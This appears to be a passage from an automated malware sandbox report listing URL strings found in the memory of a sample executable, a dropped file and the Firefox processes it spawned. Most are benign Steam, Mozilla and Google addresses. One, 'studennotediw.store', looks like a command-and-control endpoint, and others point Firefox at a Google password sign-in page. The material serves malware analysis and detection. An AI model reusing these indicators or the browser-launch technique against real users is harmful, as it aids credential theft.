Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3262272716.00000137A88F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3181915988.000001379A8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000019.00000002.3268801585.00000137A92F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3074602555.00000137A92F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozi
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3235672000.00000137A0FB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsUnable
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DDDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026487820.00000137A6A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A0106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: file.exe, 00000000.00000003.2147753615.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/lear
Source: file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3016636539.00000137A6189000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000019.00000003.2975681250.000001379E91D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3037293440.00000137A62BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2108201890.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108149493.00000000059D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2108287783.00000000059D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2977256992.000001379E98A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3037293440.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A0106000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6961000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A698F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3080579701.00000137A1B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A699D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A697C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026487820.00000137A6A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F3F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000019.00000002.3258641939.00000137A69E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3181915988.000001379A807000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3273600279.00002250CC504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3262272716.00000137A88F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3179268401.000001379A0B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3179268401.000001379A003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A697C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/firefox-desktop-password-au
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3028904621.00000137A8F33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3026895812.00000137A8F35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/KeywordUtils.sys.mjsresource://gre/module
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3157667654.000001804BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: file.exe, 00000000.00000003.2134472966.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A91E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: file.exe, 00000000.00000003.2201148750.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151059602.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147845498.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151283183.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236560303.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2167545129.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2250494766.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A6715000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3084260888.00000137A1B62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272739048.00000F92B5563000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3220295992.00000137A01FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3112035242.00000137A02B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0E9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3101120989.00000137A02B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3109478738.00000137A0372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3087918293.00000137A0372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3168467710.000001378E4B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799FAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E85E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3168685782.000001378E4D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2958094228.00000292F5761000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2963173748.00000249FBEE3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3168685782.000001378E4D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd_setSearchProviderIn
